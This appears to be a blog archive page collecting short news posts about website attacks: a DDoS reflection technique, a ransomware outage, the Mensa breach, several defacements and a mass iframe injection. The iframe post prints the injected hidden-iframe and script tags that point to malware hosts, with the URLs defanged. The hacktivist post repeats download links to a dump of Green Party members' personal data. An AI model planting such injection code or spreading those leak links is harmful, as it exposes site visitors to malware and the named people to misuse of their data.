Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Website Attack. Show all posts

DoS Attackers are Employing ‘TCP Middlebox Reflection’ to Knock Websites Offline

 


Distributed denial-of-service (DDoS) hackers are employing a new amplification technique called TCP Middlebox Reflection to target websites. Last week, researchers at Akamai, a content distribution network firm, detected the novel attack methodology for the first time in the wild, six months after the technique was published in theory. 

"The attack […] abuses vulnerable firewalls and content filtering systems to reflect and amplify TCP traffic to a victim machine, creating a powerful DDoS attack," Akamai researchers stated in a blog post. "This type of attack dangerously lowers the bar for DDoS attacks, as the attacker needs as little as 1/75th (in some cases) the amount of bandwidth from a volumetric standpoint."

Generally, most DDoS assaults exploit the User Datagram Protocol (UDP) to amplify packet delivery by sending packets to a server that replies with a larger packet size, which is then forwarded to the victim. In these attacks, the attacker sends thousands of DNS or NTP requests containing a fake source IP address to the victim, causing the destination server to return the responses back to the spoofed address in an amplified manner that exhausts the bandwidth issued to the target. 

The amplification technique was published in a research paper in August 2021, which showed that malicious actors could exploit middleboxes such as firewalls via TCP to magnify denial of service attacks.  

While UDP reflection vectors DoS amplification attacks have traditionally been used in DoS amplification assaults due to the protocol’s connectionless nature. The novel attack approach exploits TCP non-compliance in middleboxes such as deep packet inspection (DPI) tools to launch TCP-based reflective amplification assaults.  

The first wave of this novel campaign is said to have occurred around February 17, targeting Akamai customers across banking, travel, gaming, media, and web hosting industries with high amounts of traffic that peaked at 11 Gbps at 1.5 million packets per second (Mpps).  

"The vector has been seen used alone and as part of multi-vector campaigns, with the sizes of the attacks slowly climbing," Chad Seaman, lead of the security intelligence research team (SIRT) at Akamai, explained.  

The basic thought of attackers with TCP-based reflection is to exploit the middleboxes that are used to enforce censorship laws and enterprise content filtering policies by sending specially designed TCP packets to trigger a volumetric response. Indeed, in some cases, Akamai noted that a single SYN packet with a 33-byte payload triggered a 2,156-byte response, effectively achieving an amplification factor of 65x (6,533%).  

"The main takeaway is that the new vector is starting to see real world abuse in the wild. Typically, this is a signal that more widespread abuse of a particular vector is likely to follow as knowledge and popularity grows across the DDoS landscape and more attackers begin to create tooling to leverage the new vector,” Seaman explained.

Ransomware Attack Hits Sandhills Online Machinery Market

 

Sandhills Global, a leading industry publication, has been hit by a ransomware assault, resulting in hosted websites being unavailable and affecting their company operations. 

Sandhills Global is a trade publishing and hosting firm headquartered in the United States that serves the transportation, agriculture, aircraft, heavy machinery, and technology industries. 

The firm offers a variety of printed and online trade magazines that include industry news as well as a marketplace for dealers to sell relevant new and old machinery. 

Sandhills Global's website and all of their hosted publications went offline on October 1, and their phones stopped working. Users are presented with a Cloudflare Origin DNS error page while attempting to access websites hosted on Sandhills' platform, suggesting that Cloudflare is unable to connect to Sandhills' servers. 

Several sources have informed BleepingComputer that the disruptions are the result of a Conti ransomware assault. This attack reportedly happened in the early morning on Thursday, leading the firm to take down all of its IT systems to stop the escalation of the attack.

Over the years, the Conti ransomware group has been involved in a large number of attacks, including high-profile operations targeting JVCKenwood, the City of Tulsa, Ireland's Health Service Executive (HSE), and Advantech. 

When carrying out assaults, the Conti group generally steals files before encrypting devices to use them as extra leverage during extortion operations. They then demand multi-million dollar ransom payments in order to receive a decryptor and not leak stolen data. 

It's unclear how much the Conti seeks from Sandhills, or whether they acquired data during the attack. Sandhills has been contacted by BleepingComputer with questions regarding the assault but didn't receive any response. 

While Sandhills Global has not responded to the email, a customer shared an email with BleepingComputer which confirmed the ransomware assault. 

The email stated, “Sandhills Global is currently responding to a ransomware attack that impacted our operations. Systems and operations have been temporarily shut down to protect data and information, and we have retained cybersecurity experts to assist us with the investigation, which is ongoing. We are working actively and diligently with the assistance of our retained experts to fully restore operations. At this time, we are continuing to investigate whether any of our client's information has been accessed or impacted by this incident. 

At this time, we have not discovered evidence that confirms that customer information has been compromised. Please know that our clients are our number one priority and we are working diligently to restore operations and remediate the attack. At this time, our ability to respond to your messages may be delayed. 

We appreciate your patience and deeply regret any inconvenience this may cause. We will provide updates regarding this matter and the status of our services as soon as possible.”

Mensa Website Hacked After Britain’s Smartest Folk Failed To Secure Passwords

 

The community of British Mensa, which is popularly known for its people with high IQs, they have failed to secure the passwords on their website properly and it has resulted in a massive heck of their sensitive credentials including their member’s personal data. 

According to the former director and technology officer at British Mensa, Eugene Hopkinson has made a statement that the organization had failed to secure the data of its 18,000 members accurately, the report reads in the FT. 

Hopkinson claimed, “that the stored passwords of Mensa members were not hashed, potentially allowing hackers to unscramble them”. The unprecedented security attack has become all the more serious this week when the people of the community acknowledged it had been the victim of a cyber attack. Currently, the Mensa website is unavailable and a message is displaying on the website which notifies that “site under maintenance”. 

In an emergency directors’ meeting, a Mensa member told the FT that “it was confirmed that the Mensa site had been hacked this morning, using the credentials of one of the organization’s directors. It was also confirmed that there were lots of Mensa members’ passwords stored in plain text. The society had sent him his password in plain text within the past year”. It has also been observed that several stashes of Mensa personal credentials have been posted onto the Pastebin website, whilst some data have been removed from the website. 

Hopkinson told the FT that “the Mensa website held lots of sensitive information on its members, including payment details, instant messaging conversations, and IQ scores of both current members and failed applicants. “If a breach is found to have taken place, I have no faith that the [Mensa] board and office will report it adequately... or take sufficient mitigating action to prevent further harm,” Hopkinson has written this in an open letter announcing his resignation. A fellow board member resigned in protest at the same issue. Meanwhile, a spokesperson for Mensa told the FT that “the data such as members’ passwords had been encrypted and that the organization was in the process of hashing passwords,”

Additionally, “the spokesperson has denied that passwords were ever sent out in plain text and that it had handed details of the cyberattack to Britain’s Information Commissioner with a view to pursuing a criminal investigation”. Mensa is a non-profit organization, which is only open to those people who score high marks in standardized IQ test such as in the 98th percentile

Press Release from Freedom fights and the Green party hacked

@ForFreed0m has released a press release and dump of info from the Green Party in name of #antisec.

This is what they said:
To every man, woman & child… We want an end to the glamorization of negativity in the media. We want an end to status symbols dictating our worth as individuals.

We want a meaningful and free universal education system. We want substance in the place of popularity. We will not compromise who we are to be accepted by the crowd. We want the invisible walls that separate by wealth, race & class to be torn down. We want to think our own thoughts. We will be responsible for our environment.

Dear internetz, today we bring you our release from “Freedom Fighters”. I laugh at the New World Order trying to enslave us via the media and politicians lying, we want an end to the biased press whom want to destroy our freedoms via fear. Fear is the way how the globalist’s want to control us, controlling our laws and establishing a police state which is what we are fighting against. We want our god given rights on privacy and being able to use our founding laws to control the government, not the government controlling us. We don’t want the government to be groping us in airports, we don’t want the government to enforce statutes to support the bankers but not support the citizens, we want a free government who listens to the citizens of the situating country and not listen to the globalist’s. This is why humans have revolutions for example: Libya. The Libya citizens fought up against the regime because they thought they were being suppressed and cruelly controlled. That is because we are humans and not robots, good day to you.

Our twitter: @ForFreed0m GO THERE FOR UPDATES

The Release Details:-

Oh herro Green Party, we just hacked you #Antisec

FirstName LastName Address Address2 CityHome StateHome ZipHome Phone Ofice_Email Gender Ethnicity Sexuality Under30 Disabili Active

Good day ‘ole chaps

DOWNLOAD HERE: http://www.mediafire.com/?rjzt1sc1uvlt41d

Pastebin Link:http://pastebin.com/HeZt8kXP

South Korean Social network hack left 35 million users data at risk

South korean Social network Cyworld website hack left 35 million users personal info at risk.

Names, email addresses, phone numbers and other details may be compromised by the hackers.


South Korean police are reportedly launched the investigation on the cyworld hack.

 "By any standard this is a massive attack and one of many in recent months where the finger has been pointed at hackers based in China. It's too early to say whether this attack is politically motivated or merely an attempt to steal personal information for financial gain." The register quoted Mark Darvill, director at security appliance firm AEP Networks as saying.

There are approximately 49m people in south Korea that means more than 80% people affected by this hack attack.

SPINNPHR hacked By Inj3ct0r


SPINN, Secure Personal Information and Notification Network, is a confidential and secure online service that allows you to access and organize your health information.

When i tried to visit the SPINN's website(spinnnphr.com) , the page displayed an image that contains the text "INJ3CTOR". 

It appears the hack was done by the inj3ct0r team.  They've placed a website link near to the SPINN logo .

I took a screenshot of the defaced website. At the time of writing, the website still shows the defacement page. Here is the screenshot i took :

90000 Web Pages Infected by Mass IFrame Injection

Security Experts Wayne Huang, Chris Hsiao, NightCola Lin discovered the Massive Iframe attack on commerce websites. There is more than 90000 websites infected by this attack. All infected websites pointing to willysy.com.

Google indicates more than 90,000 infected pages (note it's pages not domains)


Massive Injection:
initially it was:

<iframe src="hxxp://willysy.com/images/banners/" style="position: absolute; visibility: hidden;"></iframe>

Later it became:
<script src="hxxp://exero.eu/catalog/jquery.js">
</script>

As per armorize, the infected websites redirected to some other malware domain and downloads malwares to client system.

Screenshots of Infected Pages:




Video :


source:armorize

Hackers defaced PNRI website

Unknown hackers break into the Philippine Nuclear Research Institute(pnri.dost.gov.ph) .

When users tried to visit the PNRI website , they got a pop message "Go PNoy. You can do it," instead of normal page.

"Other popup messages included 'shouts' to hacker groups PrivateX, Philkers, Blackrain, and MjM."Gmanetwork report reads.

Once user click the popup message, they were brought to the defacement page.  The defacement page contains the logos PrivateX and Philker, with music in the background.